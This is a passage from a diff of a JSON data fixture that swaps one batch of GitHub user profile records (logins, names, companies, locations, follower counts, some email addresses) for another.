"https://avatars.githubusercontent.com/u/8297838?v=4", + "company": "", + "location": "New Zealand", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 28, + "public_gists_count": 0, + "public_repositories_count": 83, + "created_at": "2014-07-29T09:10:25Z", + "updated_at": "2024-08-28T11:32:02Z", + "node_id": "MDQ6VXNlcjgyOTc4Mzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "Codex0" + } +}, +{ + "model": "github.user", + "pk": 6479, + "fields": { + "nest_created_at": "2024-09-22T07:44:49.117Z", + "nest_updated_at": "2024-09-22T18:47:21.030Z", + "name": "Arthur Lutz", + "login": "arthurlutz", + "email": "arthur.lutz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/108437?v=4", + "company": "Personnal account", "location": "France", "collaborators_count": 0, - "following_count": 16, + "following_count": 9, "followers_count": 28, - "public_gists_count": 3, - "public_repositories_count": 73, - "created_at": "2013-02-05T22:27:02Z", - "updated_at": "2024-09-06T11:27:12Z", - "node_id": "MDQ6VXNlcjM0ODYyMzE=", - "bio": "Open Source believer, I work as a Java, JS and Frontend Technical Expert at @Smile-SA", + "public_gists_count": 10, + "public_repositories_count": 153, + "created_at": "2009-07-24T19:58:54Z", + "updated_at": "2024-08-15T12:27:55Z", + "node_id": "MDQ6VXNlcjEwODQzNw==", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "arthurlutzim" } }, { "model": "github.user", - "pk": 1211, + "pk": 6480, "fields": { - "nest_created_at": "2024-09-11T23:07:18.128Z", - "nest_updated_at": "2024-09-11T23:07:18.128Z", - "name": "Jacek Puchta", - "login": "puchta", - "email": "jacek.puchta@dotdata.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29863240?v=4", - "company": "dotData Inc.", - "location": "Warsaw", + "nest_created_at": "2024-09-22T07:44:49.445Z", + "nest_updated_at": "2024-09-22T18:47:21.349Z", + "name": "Igor Dimitrijevic", + "login": "igord", + "email": "grmail@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/467808?v=4", + "company": "", + "location": "Amsterdam, Netherlands", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2017-07-03T12:33:48Z", - "updated_at": "2024-08-19T08:48:44Z", - "node_id": "MDQ6VXNlcjI5ODYzMjQw", + "following_count": 0, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2010-11-04T19:10:43Z", + "updated_at": "2023-10-25T09:20:38Z", + "node_id": "MDQ6VXNlcjQ2NzgwOA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390528,24 +647927,24 @@ }, { "model": "github.user", - "pk": 1212, + "pk": 6481, "fields": { - "nest_created_at": "2024-09-11T23:07:23.217Z", - "nest_updated_at": "2024-09-12T01:40:20.972Z", - "name": "Visagan Santhanam", - "login": "visagansanthanam-unisys", + "nest_created_at": "2024-09-22T07:44:49.767Z", + "nest_updated_at": "2024-09-22T18:47:21.695Z", + "name": "Joona Heinikoski", + "login": "joonamo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/100369838?v=4", - "company": "@Unisys ", + "avatar_url": "https://avatars.githubusercontent.com/u/2312529?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-02-24T16:12:20Z", - "updated_at": "2024-03-27T13:01:17Z", - "node_id": "U_kgDOBfuFrg", + "public_repositories_count": 38, + "created_at": "2012-09-09T18:29:18Z", + "updated_at": "2024-06-30T13:48:02Z", + "node_id": "MDQ6VXNlcjIzMTI1Mjk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390553,24 +647952,24 @@ }, { "model": "github.user", - "pk": 1213, + "pk": 6482, "fields": { - "nest_created_at": "2024-09-11T23:07:38.625Z", - "nest_updated_at": "2024-09-11T23:07:38.625Z", - "name": "Gabriel Bennett", - "login": "gbennett-squarespace", + "nest_created_at": "2024-09-22T07:45:15.504Z", + "nest_updated_at": "2024-09-22T18:47:48.064Z", + "name": "Adam Smith", + "login": "chemsoc", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95309935?v=4", - "company": "Squarespace", - "location": "Portland, OR", + "avatar_url": "https://avatars.githubusercontent.com/u/647701?v=4", + "company": "GForces", + "location": "Maidstone", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-11-30T18:32:06Z", - "updated_at": "2024-06-08T17:04:24Z", - "node_id": "U_kgDOBa5Qbw", + "public_repositories_count": 4, + "created_at": "2011-03-02T20:26:00Z", + "updated_at": "2018-09-25T15:20:23Z", + "node_id": "MDQ6VXNlcjY0NzcwMQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390578,49 +647977,49 @@ }, { "model": "github.user", - "pk": 1214, + "pk": 6483, "fields": { - "nest_created_at": "2024-09-11T23:07:44.016Z", - "nest_updated_at": "2024-09-11T23:07:44.016Z", - "name": "", - "login": "Amoms", + "nest_created_at": "2024-09-22T07:45:27.536Z", + "nest_updated_at": "2024-09-22T18:48:00.043Z", + "name": "Thomas Graf", + "login": "t-graf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/140499470?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84958577?v=4", + "company": "Siemens AG", + "location": "Karlsruhe", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2023-07-25T09:27:26Z", - "updated_at": "2023-11-17T05:38:28Z", - "node_id": "U_kgDOCF_aDg", - "bio": "", + "created_at": "2021-05-28T06:59:48Z", + "updated_at": "2021-05-28T07:11:06Z", + "node_id": "MDQ6VXNlcjg0OTU4NTc3", + "bio": "Software developer, software architect and software license compliance officer at Siemens", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1215, + "pk": 6484, "fields": { - "nest_created_at": "2024-09-11T23:07:46.108Z", - "nest_updated_at": "2024-09-11T23:07:46.108Z", + "nest_created_at": "2024-09-22T07:45:27.861Z", + "nest_updated_at": "2024-09-22T18:48:00.362Z", "name": "", - "login": "yff-java", + "login": "jhlmco", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60810545?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/126677738?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2020-02-08T08:47:59Z", - "updated_at": "2024-08-18T11:56:32Z", - "node_id": "MDQ6VXNlcjYwODEwNTQ1", + "public_repositories_count": 2, + "created_at": "2023-03-01T12:16:58Z", + "updated_at": "2024-05-07T11:50:30Z", + "node_id": "U_kgDOB4zy6g", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390628,24 +648027,24 @@ }, { "model": "github.user", - "pk": 1216, + "pk": 6485, "fields": { - "nest_created_at": "2024-09-11T23:07:47.315Z", - "nest_updated_at": "2024-09-11T23:07:48.135Z", - "name": "Swetha Krishnan", - "login": "swkrkris", + "nest_created_at": "2024-09-22T07:45:28.170Z", + "nest_updated_at": "2024-09-22T18:48:00.680Z", + "name": "", + "login": "ilans", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/93231519?v=4", - "company": "@Oracle Cloud Infrastructure ", + "avatar_url": "https://avatars.githubusercontent.com/u/821370?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-10-26T23:54:15Z", - "updated_at": "2024-04-03T23:57:09Z", - "node_id": "U_kgDOBY6Znw", + "public_repositories_count": 14, + "created_at": "2011-05-31T18:43:02Z", + "updated_at": "2024-04-03T21:28:51Z", + "node_id": "MDQ6VXNlcjgyMTM3MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390653,24 +648052,24 @@ }, { "model": "github.user", - "pk": 1217, + "pk": 6486, "fields": { - "nest_created_at": "2024-09-11T23:07:48.989Z", - "nest_updated_at": "2024-09-11T23:07:48.989Z", - "name": "Pandiyan", - "login": "pandiyan-securin", + "nest_created_at": "2024-09-22T07:45:29.463Z", + "nest_updated_at": "2024-09-22T18:48:01.986Z", + "name": "", + "login": "thiago-gitlab", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/144091669?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/77592975?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-09-05T05:20:28Z", - "updated_at": "2024-05-08T12:05:34Z", - "node_id": "U_kgDOCJaqFQ", + "public_repositories_count": 5, + "created_at": "2021-01-17T23:13:49Z", + "updated_at": "2024-08-08T05:01:48Z", + "node_id": "MDQ6VXNlcjc3NTkyOTc1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390678,24 +648077,24 @@ }, { "model": "github.user", - "pk": 1218, + "pk": 6487, "fields": { - "nest_created_at": "2024-09-11T23:07:53.153Z", - "nest_updated_at": "2024-09-11T23:07:53.153Z", - "name": "vipul anant", - "login": "anvipul", + "nest_created_at": "2024-09-22T07:45:29.775Z", + "nest_updated_at": "2024-09-22T18:48:02.313Z", + "name": "", + "login": "b-grooters-byte", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/110393012?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12254990?v=4", + "company": "ByteTrail, LLC", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-08-01T11:07:37Z", - "updated_at": "2024-09-06T11:43:39Z", - "node_id": "U_kgDOBpR2tA", + "public_repositories_count": 19, + "created_at": "2015-05-05T14:20:49Z", + "updated_at": "2024-08-14T16:17:54Z", + "node_id": "MDQ6VXNlcjEyMjU0OTkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390703,49 +648102,49 @@ }, { "model": "github.user", - "pk": 1219, + "pk": 6488, "fields": { - "nest_created_at": "2024-09-11T23:07:59.791Z", - "nest_updated_at": "2024-09-11T23:10:31.741Z", - "name": "Aryan Rajoria", - "login": "aryan-rajoria", + "nest_created_at": "2024-09-22T07:45:30.098Z", + "nest_updated_at": "2024-09-22T18:48:02.633Z", + "name": "ds-ak", + "login": "ds-ak", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57455619?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32156918?v=4", + "company": "@Appknox", + "location": "Appknox", "collaborators_count": 0, - "following_count": 21, - "followers_count": 12, + "following_count": 3, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 38, - "created_at": "2019-11-06T17:36:26Z", - "updated_at": "2024-09-05T07:55:38Z", - "node_id": "MDQ6VXNlcjU3NDU1NjE5", - "bio": "Masters at Georgia Tech", - "is_hireable": false, + "public_repositories_count": 3, + "created_at": "2017-09-21T06:50:49Z", + "updated_at": "2023-10-30T08:52:35Z", + "node_id": "MDQ6VXNlcjMyMTU2OTE4", + "bio": "@appknox exployee", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1220, + "pk": 6489, "fields": { - "nest_created_at": "2024-09-11T23:08:10.264Z", - "nest_updated_at": "2024-09-11T23:08:10.264Z", - "name": "June", - "login": "SSJune821", + "nest_created_at": "2024-09-22T07:45:30.441Z", + "nest_updated_at": "2024-09-22T18:48:02.957Z", + "name": "", + "login": "jcburgo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26968714?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135140309?v=4", + "company": "Amazon", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2017-04-06T13:59:54Z", - "updated_at": "2024-04-12T04:53:12Z", - "node_id": "MDQ6VXNlcjI2OTY4NzE0", + "created_at": "2023-05-31T14:21:05Z", + "updated_at": "2024-09-05T11:10:53Z", + "node_id": "U_kgDOCA4T1Q", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390753,24 +648152,24 @@ }, { "model": "github.user", - "pk": 1221, + "pk": 6490, "fields": { - "nest_created_at": "2024-09-11T23:08:28.836Z", - "nest_updated_at": "2024-09-11T23:08:28.836Z", + "nest_created_at": "2024-09-22T07:45:30.754Z", + "nest_updated_at": "2024-09-22T18:48:03.286Z", "name": "", - "login": "srace9532", + "login": "jhoward-lm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22940652?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/140011346?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-10-19T16:16:31Z", - "updated_at": "2024-09-10T02:09:24Z", - "node_id": "MDQ6VXNlcjIyOTQwNjUy", + "public_repositories_count": 2, + "created_at": "2023-07-19T18:50:42Z", + "updated_at": "2024-08-27T14:38:08Z", + "node_id": "U_kgDOCFhnUg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390778,24 +648177,24 @@ }, { "model": "github.user", - "pk": 1222, + "pk": 6491, "fields": { - "nest_created_at": "2024-09-11T23:08:30.500Z", - "nest_updated_at": "2024-09-11T23:08:30.500Z", - "name": "Hariharan", - "login": "hari326", + "nest_created_at": "2024-09-22T07:45:31.062Z", + "nest_updated_at": "2024-09-22T18:48:03.598Z", + "name": "", + "login": "lmco-ek", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15031266?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/105302662?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2015-10-08T11:03:32Z", - "updated_at": "2024-08-20T11:35:51Z", - "node_id": "MDQ6VXNlcjE1MDMxMjY2", + "public_repositories_count": 1, + "created_at": "2022-05-10T15:16:02Z", + "updated_at": "2022-05-10T15:16:02Z", + "node_id": "U_kgDOBkbKhg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390803,99 +648202,124 @@ }, { "model": "github.user", - "pk": 1223, + "pk": 6492, "fields": { - "nest_created_at": "2024-09-11T23:08:32.178Z", - "nest_updated_at": "2024-09-11T23:08:32.178Z", - "name": "James Holland", - "login": "hoggmania", - "email": "hoggmania@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1778197?v=4", - "company": "", - "location": "UK", + "nest_created_at": "2024-09-22T07:45:31.685Z", + "nest_updated_at": "2024-09-22T18:49:33.658Z", + "name": "Mateusz Dyminski", + "login": "mateuszdyminski", + "email": "dyminski@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4962812?v=4", + "company": "RAD Security", + "location": "Wroclaw, Poland", "collaborators_count": 0, - "following_count": 24, - "followers_count": 10, - "public_gists_count": 5, - "public_repositories_count": 118, - "created_at": "2012-05-25T14:19:46Z", - "updated_at": "2024-09-06T07:50:17Z", - "node_id": "MDQ6VXNlcjE3NzgxOTc=", - "bio": "", - "is_hireable": false, - "twitter_username": "j_w_holland" + "following_count": 8, + "followers_count": 53, + "public_gists_count": 1, + "public_repositories_count": 84, + "created_at": "2013-07-08T07:39:32Z", + "updated_at": "2024-09-09T14:55:10Z", + "node_id": "MDQ6VXNlcjQ5NjI4MTI=", + "bio": "Go & K8s", + "is_hireable": true, + "twitter_username": "m_dyminski" } }, { "model": "github.user", - "pk": 1224, + "pk": 6493, "fields": { - "nest_created_at": "2024-09-11T23:08:35.519Z", - "nest_updated_at": "2024-09-11T23:08:35.520Z", - "name": "Mahesh Narayan", - "login": "mahenarayan", + "nest_created_at": "2024-09-22T07:45:32.973Z", + "nest_updated_at": "2024-09-22T18:48:05.504Z", + "name": "John Vandenberg", + "login": "jayvdb", + "email": "jayvdb@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15092?v=4", + "company": "@franklin-ai", + "location": "Perth, Australia", + "collaborators_count": 0, + "following_count": 300, + "followers_count": 502, + "public_gists_count": 30, + "public_repositories_count": 1514, + "created_at": "2008-06-26T05:47:55Z", + "updated_at": "2024-09-16T00:44:45Z", + "node_id": "MDQ6VXNlcjE1MDky", + "bio": "Team Lead", + "is_hireable": true, + "twitter_username": "jayvdb" + } +}, +{ + "model": "github.user", + "pk": 6494, + "fields": { + "nest_created_at": "2024-09-22T07:45:33.283Z", + "nest_updated_at": "2024-09-22T18:51:45.500Z", + "name": "Florian Greinacher", + "login": "fgreinacher", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/154434373?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1540469?v=4", + "company": "@siemens", "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 1, - "created_at": "2023-12-20T12:27:41Z", - "updated_at": "2024-09-05T09:55:40Z", - "node_id": "U_kgDOCTR7RQ", - "bio": "", + "following_count": 40, + "followers_count": 49, + "public_gists_count": 5, + "public_repositories_count": 80, + "created_at": "2012-03-15T13:46:14Z", + "updated_at": "2024-09-10T18:40:00Z", + "node_id": "MDQ6VXNlcjE1NDA0Njk=", + "bio": "Senior DevOps Engineer and Social Coding Ambassador at Siemens", "is_hireable": false, - "twitter_username": "" + "twitter_username": "fgreinacher" } }, { "model": "github.user", - "pk": 1225, + "pk": 6495, "fields": { - "nest_created_at": "2024-09-11T23:08:38.453Z", - "nest_updated_at": "2024-09-12T01:39:21.107Z", - "name": "Kjjj", - "login": "JingLeiTalan", + "nest_created_at": "2024-09-22T07:45:33.595Z", + "nest_updated_at": "2024-09-22T18:49:31.483Z", + "name": "Emery Hemingway", + "login": "ehmry", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92030419?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/537775?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-10-06T11:50:24Z", - "updated_at": "2024-07-02T13:49:43Z", - "node_id": "U_kgDOBXxF0w", - "bio": "", + "followers_count": 136, + "public_gists_count": 3, + "public_repositories_count": 84, + "created_at": "2010-12-27T12:14:01Z", + "updated_at": "2024-09-17T17:22:57Z", + "node_id": "MDQ6VXNlcjUzNzc3NQ==", + "bio": "My code isn't here.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1226, + "pk": 6496, "fields": { - "nest_created_at": "2024-09-11T23:08:39.674Z", - "nest_updated_at": "2024-09-11T23:17:31.197Z", - "name": "Taha Al Khashmany", - "login": "Taha-cmd", + "nest_created_at": "2024-09-22T07:45:33.914Z", + "nest_updated_at": "2024-09-22T18:48:06.510Z", + "name": "Chin Yeung", + "login": "chinyeungli", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/56194280?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4246379?v=4", + "company": "nexB", "location": "", "collaborators_count": 0, - "following_count": 9, - "followers_count": 12, + "following_count": 7, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2019-10-05T12:16:15Z", - "updated_at": "2024-09-05T12:08:19Z", - "node_id": "MDQ6VXNlcjU2MTk0Mjgw", + "public_repositories_count": 7, + "created_at": "2013-04-24T14:33:51Z", + "updated_at": "2024-09-10T01:26:58Z", + "node_id": "MDQ6VXNlcjQyNDYzNzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390903,24 +648327,24 @@ }, { "model": "github.user", - "pk": 1227, + "pk": 6497, "fields": { - "nest_created_at": "2024-09-11T23:08:41.384Z", - "nest_updated_at": "2024-09-11T23:08:41.384Z", - "name": "Pedro Ferracini", - "login": "grgau", + "nest_created_at": "2024-09-22T07:45:34.239Z", + "nest_updated_at": "2024-09-22T18:48:06.818Z", + "name": "camillem", + "login": "camillem", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16718424?v=4", - "company": "University of Sao Paulo (USP)", - "location": "São José do Rio Preto, Brazil", + "avatar_url": "https://avatars.githubusercontent.com/u/438000?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 20, - "followers_count": 19, + "following_count": 3, + "followers_count": 10, "public_gists_count": 1, - "public_repositories_count": 30, - "created_at": "2016-01-15T11:17:50Z", - "updated_at": "2024-05-03T04:29:42Z", - "node_id": "MDQ6VXNlcjE2NzE4NDI0", + "public_repositories_count": 34, + "created_at": "2010-10-13T13:42:37Z", + "updated_at": "2024-09-15T17:37:32Z", + "node_id": "MDQ6VXNlcjQzODAwMA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390928,24 +648352,24 @@ }, { "model": "github.user", - "pk": 1228, + "pk": 6498, "fields": { - "nest_created_at": "2024-09-11T23:08:43Z", - "nest_updated_at": "2024-09-11T23:08:43Z", - "name": "Sébastien Crocquesel", - "login": "scrocquesel", + "nest_created_at": "2024-09-22T07:45:34.546Z", + "nest_updated_at": "2024-09-22T18:48:07.126Z", + "name": "Andreas", + "login": "wallrat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/88554524?v=4", - "company": "Inulogic", - "location": "Lyon, France", + "avatar_url": "https://avatars.githubusercontent.com/u/100818?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 13, - "public_gists_count": 1, - "public_repositories_count": 34, - "created_at": "2021-08-06T17:14:38Z", - "updated_at": "2024-08-17T14:54:33Z", - "node_id": "MDQ6VXNlcjg4NTU0NTI0", + "following_count": 4, + "followers_count": 24, + "public_gists_count": 12, + "public_repositories_count": 57, + "created_at": "2009-07-01T20:27:15Z", + "updated_at": "2023-10-28T19:20:52Z", + "node_id": "MDQ6VXNlcjEwMDgxOA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390953,99 +648377,99 @@ }, { "model": "github.user", - "pk": 1229, + "pk": 6499, "fields": { - "nest_created_at": "2024-09-11T23:08:52.534Z", - "nest_updated_at": "2024-09-12T01:38:15.703Z", - "name": "", - "login": "evyaroshevich", + "nest_created_at": "2024-09-22T07:45:34.887Z", + "nest_updated_at": "2024-09-22T18:48:07.436Z", + "name": "AccellenceDev", + "login": "accellence", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42962140?v=4", - "company": "Safe roads of Belarus", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45636238?v=4", + "company": "Accellence Technologies GmbH", + "location": "Hannover (Germany)", "collaborators_count": 0, - "following_count": 0, + "following_count": 2, "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 8, - "created_at": "2018-09-04T08:55:33Z", - "updated_at": "2024-05-15T15:05:17Z", - "node_id": "MDQ6VXNlcjQyOTYyMTQw", - "bio": "Lead Communications Engineer", + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-12-05T17:22:39Z", + "updated_at": "2024-08-16T07:34:55Z", + "node_id": "MDQ6VXNlcjQ1NjM2MjM4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1230, + "pk": 6500, "fields": { - "nest_created_at": "2024-09-11T23:09:04.816Z", - "nest_updated_at": "2024-09-11T23:09:13.639Z", - "name": "Mohammed Aziz", - "login": "MohammedAziz02", + "nest_created_at": "2024-09-22T07:45:43.391Z", + "nest_updated_at": "2024-09-22T18:48:15.978Z", + "name": "Robert Maaskant", + "login": "RobertMaaskant", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64214635?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/365056?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 36, - "created_at": "2020-04-23T15:32:04Z", - "updated_at": "2024-08-28T22:28:14Z", - "node_id": "MDQ6VXNlcjY0MjE0NjM1", - "bio": "je suis Mohammed aziz, un élève ingénieur à l'école nationale des sciences appliquées d'Al hoceima.", + "public_repositories_count": 3, + "created_at": "2010-08-15T14:50:16Z", + "updated_at": "2024-09-20T20:52:08Z", + "node_id": "MDQ6VXNlcjM2NTA1Ng==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1231, + "pk": 6501, "fields": { - "nest_created_at": "2024-09-11T23:09:05.640Z", - "nest_updated_at": "2024-09-11T23:09:06.442Z", - "name": "Peter Ivanov", - "login": "vveider", - "email": "mr.weider@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2734985?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:45:44.344Z", + "nest_updated_at": "2024-09-22T18:48:16.939Z", + "name": "Jürgen Hermann", + "login": "jhermann", + "email": "jh@web.de", + "avatar_url": "https://avatars.githubusercontent.com/u/1068245?v=4", + "company": "@mam-dev ", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 2, - "public_repositories_count": 2, - "created_at": "2012-11-06T12:44:06Z", - "updated_at": "2024-09-05T10:59:56Z", - "node_id": "MDQ6VXNlcjI3MzQ5ODU=", - "bio": "", + "following_count": 85, + "followers_count": 188, + "public_gists_count": 4, + "public_repositories_count": 153, + "created_at": "2011-09-21T15:04:00Z", + "updated_at": "2024-09-05T11:25:32Z", + "node_id": "MDQ6VXNlcjEwNjgyNDU=", + "bio": "Pythonista. Writer of docs. DevOps practitioner. Taming distributed systems. Dabbling in data science.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1232, + "pk": 6502, "fields": { - "nest_created_at": "2024-09-11T23:09:12.363Z", - "nest_updated_at": "2024-09-11T23:09:12.363Z", - "name": "Lars", - "login": "3l73", + "nest_created_at": "2024-09-22T07:45:44.649Z", + "nest_updated_at": "2024-09-22T18:48:17.253Z", + "name": "", + "login": "sleightsec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4559579?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/69399725?v=4", "company": "", - "location": "Europe", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2013-05-29T12:26:38Z", - "updated_at": "2024-07-04T09:45:32Z", - "node_id": "MDQ6VXNlcjQ1NTk1Nzk=", + "public_repositories_count": 0, + "created_at": "2020-08-08T18:21:12Z", + "updated_at": "2023-07-04T13:36:16Z", + "node_id": "MDQ6VXNlcjY5Mzk5NzI1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391053,49 +648477,49 @@ }, { "model": "github.user", - "pk": 1233, + "pk": 6503, "fields": { - "nest_created_at": "2024-09-11T23:09:14.473Z", - "nest_updated_at": "2024-09-11T23:09:14.473Z", - "name": "Durga Pasupuleti", - "login": "durga-pasupuleti", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22412654?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:45:44.966Z", + "nest_updated_at": "2024-09-22T19:41:56.574Z", + "name": "Praveen Mylavarapu", + "login": "praveenmylavarapu", + "email": "saipraveenmylavarapu@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3250456?v=4", + "company": "Interactive Brokers LLC", + "location": "New York City", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 52, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2016-09-24T10:52:58Z", - "updated_at": "2024-06-13T19:51:59Z", - "node_id": "MDQ6VXNlcjIyNDEyNjU0", - "bio": "", - "is_hireable": false, + "public_repositories_count": 25, + "created_at": "2013-01-12T07:10:46Z", + "updated_at": "2024-09-12T02:40:25Z", + "node_id": "MDQ6VXNlcjMyNTA0NTY=", + "bio": "I love Math", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1234, + "pk": 6504, "fields": { - "nest_created_at": "2024-09-11T23:09:32.328Z", - "nest_updated_at": "2024-09-11T23:09:32.328Z", + "nest_created_at": "2024-09-22T07:45:45.285Z", + "nest_updated_at": "2024-09-22T18:48:17.879Z", "name": "", - "login": "pig837", + "login": "a1lu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10391680?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5518716?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-01-04T18:07:46Z", - "updated_at": "2024-08-14T07:41:53Z", - "node_id": "MDQ6VXNlcjEwMzkxNjgw", + "public_repositories_count": 18, + "created_at": "2013-09-23T12:30:49Z", + "updated_at": "2024-06-10T10:36:54Z", + "node_id": "MDQ6VXNlcjU1MTg3MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -391103,99 +648527,99 @@ }, { "model": "github.user", - "pk": 1235, + "pk": 6505, "fields": { - "nest_created_at": "2024-09-11T23:09:33.998Z", - "nest_updated_at": "2024-09-11T23:09:33.998Z", - "name": "Erin McGill", - "login": "emcfins", + "nest_created_at": "2024-09-22T07:45:45.599Z", + "nest_updated_at": "2024-09-22T18:48:29.819Z", + "name": "Roland Weber", + "login": "rolweber", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11314145?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12234414?v=4", + "company": "@IBM", + "location": "Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, - "public_gists_count": 3, - 